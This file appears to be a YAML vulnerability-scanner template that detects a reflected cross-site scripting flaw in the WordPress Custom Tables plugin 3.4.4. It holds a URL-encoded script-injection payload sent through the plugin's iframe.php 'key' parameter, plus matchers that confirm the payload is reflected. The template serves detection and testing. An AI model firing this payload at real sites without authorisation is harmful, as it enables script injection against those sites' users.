id: wp-custom-tables-xss

info:
  name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS)
  author: daffainfo
  severity: medium
  description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability
  reference: https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252
  tags: wordpress,xss,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
